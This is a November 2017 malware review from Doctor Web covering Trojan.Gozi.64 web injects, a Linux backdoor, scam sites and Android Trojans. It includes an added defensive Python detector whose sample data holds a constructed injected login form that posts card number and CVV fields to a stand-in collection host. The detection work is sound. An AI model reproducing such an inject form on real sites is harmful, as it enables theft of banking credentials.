November 30, 2017
In November, Doctor Web specialists analyzed a new member of the Trojan.Gozi banking Trojan family. Unlike its predecessors, the new Trojan is built entirely from a set of modules and no longer contains a mechanism for generating control server domain names: the server addresses are now hard-coded into the malware's configuration.
Also in November, a new backdoor for Linux and several fraudulent websites were found. Cybercriminals used these websites to fleece money from Internet users on behalf of a nonexistent public fund.
The Gozi banking Trojan family is well known to security researchers: one of its representatives is famous for using a text file downloaded from a NASA server as a dictionary for generating control server addresses. The new version of the banking Trojan, dubbed Trojan.Gozi.64, can infect computers running 32- and 64-bit versions of Windows 7 and later. The malicious program does not run on earlier Windows versions.
Trojan.Gozi.64's main purpose is to perform web injections, that is, to insert arbitrary content into the webpages the user is browsing, for example fake authorization forms on bank websites and in online banking systems.
Because the webpage is modified directly on the infected computer, the URL shown in the browser address bar remains that of the genuine website, so the user may not notice that anything is amiss. Any data entered into a fake form is sent to the cybercriminals, which may result in the victim's account being compromised.
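The paragraph above describes how a web inject manifests: the page keeps its real URL, but its forms gain extra fields or start posting to a third-party host. The following is an added example written for this review and is not Doctor Web's code or anything from the Trojan itself. It parses a captured copy of a login page, compares its form fields against the set the genuine page is known to contain, and flags any form whose action points outside the page's origin. The bank URL, the field names and both HTML snippets are constructed for the demonstration.

```python
"""Detect web-inject style modification of a login page (added example).

Compares the forms found in a captured page against a trusted baseline of
expected field names and checks each form's action URL against the page's
origin. Hostnames, field names and HTML below are constructed sample data.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample data (hypothetical bank, not a real site).
PAGE_URL = "https://bank.example.invalid/login"
EXPECTED_FIELDS = frozenset({"login", "password"})

GENUINE_HTML = """
<form action="/auth" method="post">
  <input type="text" name="login">
  <input type="password" name="password">
  <input type="submit" value="Log in">
</form>
"""

# Same page as seen in an infected browser: two extra fields asking for card
# data, and the action rewritten to a collection host (constructed).
INJECTED_HTML = """
<form action="https://drop.example.invalid/grab" method="post">
  <input type="text" name="login">
  <input type="password" name="password">
  <input type="text" name="card_number">
  <input type="text" name="cvv">
  <input type="submit" value="Log in">
</form>
"""


class FormCollector(HTMLParser):
    """Collects every <form> with its action URL and the names of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "fields": [names]}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = a.get("name")
            # Submit buttons carry no user data, so they are not fields.
            if name and (a.get("type") or "").lower() != "submit":
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_page(page_url, html, expected_fields):
    """Return injected field names and form actions that leave the page origin."""
    parser = FormCollector()
    parser.feed(html)
    origin = urlsplit(page_url)
    findings = {"injected_fields": [], "offsite_actions": []}
    for form in parser.forms:
        # Any field the genuine page never had is a sign of injected content.
        for field in form["fields"]:
            if field not in expected_fields:
                findings["injected_fields"].append(field)
        # Resolve relative actions against the page URL, then compare origins.
        target = urlsplit(urljoin(page_url, form["action"]))
        if (target.scheme, target.netloc) != (origin.scheme, origin.netloc):
            findings["offsite_actions"].append(target.geturl())
    return findings


if __name__ == "__main__":
    print("genuine :", analyze_page(PAGE_URL, GENUINE_HTML, EXPECTED_FIELDS))
    print("injected:", analyze_page(PAGE_URL, INJECTED_HTML, EXPECTED_FIELDS))
```

The baseline of expected fields has to come from somewhere the Trojan cannot reach, such as the bank's own server-side template or a copy fetched from a clean machine; a check that reads its baseline from the same infected browser would be modified along with the page. The origin comparison catches the simplest exfiltration pattern only; an inject that keeps the original action and sends the extra fields through a separate script is detected by the field comparison, not by the action check.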
In November, cases involving the following ransomware modifications were registered by Doctor Web’s technical support service:
During November 2017, the URLs of 331,895 non-recommended websites were added to the Dr.Web database.
In November, Doctor Web described a new fraudulent scheme that has spread in the Russian segment of the Internet. Cybercriminals have been sending out spam containing a link to a website allegedly belonging to a certain "Interregional Social Fund of Development". Citing a nonexistent Decree of the Government of the Russian Federation, the cybercriminals offer to check whether website visitors are owed any payouts from various insurance companies. Visitors are asked to supply their personal insurance policy number (SNILS) or passport number. Whatever the victim enters (it can be an arbitrary sequence of digits), they receive a message saying that they have been allotted insurance payments for quite a large sum, several hundred rubles. However, in order to withdraw these savings, the cybercriminals demand a payment.
Virus analysts have detected many other fraudulent projects on the servers containing the webpages of “The Interregional Social Fund of Development”. For more details, please refer to the review on our website.
In late November, Doctor Web security researchers analyzed a new backdoor for Linux named Linux.BackDoor.Hook.1. This Trojan can download files specified in a command received from the cybercriminals, launch applications, or connect to a specified remote host. All the features of Linux.BackDoor.Hook.1 are described in our review.
In November, Doctor Web security researchers detected the Trojan Android.RemoteCode.106.origin on Google Play. This Trojan downloads additional malicious modules that load websites and tap on advertisements and links. In addition, malicious programs from the Android.SmsSend family, which send expensive SMS messages, were found in the catalog. Also in the past month, the Trojan Android.CoinMine.3 was distributed via Google Play; it used infected mobile devices to mine the Monero cryptocurrency. Furthermore, a large number of banking Trojans from the Android.Banker family were detected on Google Play. These Trojans are designed to steal private user information and money from the bank accounts of Android users.
The following November events related to mobile malware are the most noteworthy:
Find out more about malicious and unwanted programs for mobile devices in our special overview.